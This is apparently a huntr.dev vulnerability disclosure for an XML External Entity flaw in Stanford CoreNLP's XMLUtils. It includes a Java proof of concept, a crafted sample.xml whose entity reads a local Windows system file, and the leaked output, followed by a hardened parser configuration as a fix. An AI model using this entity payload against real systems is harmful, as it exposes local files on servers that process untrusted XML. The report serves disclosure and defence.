huntr: Srikanthprathi, 2F8BAF6C-14B3-420D-8EDE-9805797CD324
History: Sep 29, 2021 - 7:34 p.m.

in stanfordnlp/corenlp

2021-09-29 19:34:14
srikanthprathi
www.huntr.dev

EPSS: 0.002 (Low), Percentile: 55.8%

✍️ Description

The Stanford CoreNLP package, which provides a set of natural language analysis tools written in Java, parses XML in a way that is vulnerable to XML External Entity (XXE) injection. An attacker who can supply a crafted XML file as input to the getTextContentFromTagsFromFile() function in "XMLUtils.java" can have the parser resolve external entities, including exposing the contents of local files to a remote server.

🕵️‍♂️ Proof of Concept

package xxe_poc;

import java.io.File;
import java.util.List;
import edu.stanford.nlp.util.XMLUtils;

public class Poc {

	public static void main(String[] args) {
		// Attacker-controlled XML file carrying an external entity (see sample.xml below)
		File file = new File("C:\\Users\\[user]\\eclipse-workspace\\xxe_poc\\src\\main\\resources\\sample.xml");
		// The vulnerable helper parses the file with entity expansion enabled, so the
		// text content of <lastName> becomes the contents of the referenced local file
		List<String> returnList = XMLUtils.getTextContentFromTagsFromFile(file, "lastName");
		System.out.print(returnList);
	}
}

sample.xml

<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///c:/windows/win.ini"> ]>
<userInfo>
 <firstName>John</firstName>
 <lastName>&ent;</lastName>
</userInfo>

Check the Output:

[; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
]
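As an added defensive example (not code from the report or from CoreNLP), the same tag lookup done through a parser configured to reject DOCTYPE declarations and external entities; HardenedTagReader and getTextContentFromTags are hypothetical names, and the sample document is the report's sample.xml embedded as a constructed string.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.SAXParseException;

public class HardenedTagReader {
    // Constructed copy of the report's sample.xml, held in memory so nothing is read from disk.
    static final String SAMPLE_XML =
        "<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///c:/windows/win.ini\"> ]>\n"
      + "<userInfo>\n <firstName>John</firstName>\n <lastName>&ent;</lastName>\n</userInfo>";

    // DocumentBuilder that refuses DOCTYPE declarations and external entities outright.
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Rejecting every DOCTYPE removes inline and external entity definitions in one step.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth for parsers that honour these features instead of the one above.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf.newDocumentBuilder();
    }

    // Hypothetical hardened counterpart of getTextContentFromTagsFromFile(): same contract, safe parser.
    static List<String> getTextContentFromTags(String xml, String tagName) throws Exception {
        Document doc = hardenedBuilder().parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        NodeList nodes = doc.getElementsByTagName(tagName);
        List<String> out = new ArrayList<>();
        for (int i = 0; i < nodes.getLength(); i++) out.add(nodes.item(i).getTextContent());
        return out;
    }

    public static void main(String[] args) throws Exception {
        try {
            System.out.println(getTextContentFromTags(SAMPLE_XML, "lastName"));
        } catch (SAXParseException e) {
            // Parsing stops at the DOCTYPE: win.ini is never opened and no content is returned.
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Run against the embedded sample, the parse fails at the DOCTYPE and the list is never built; a benign document without a DOCTYPE returns the tag contents as before.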
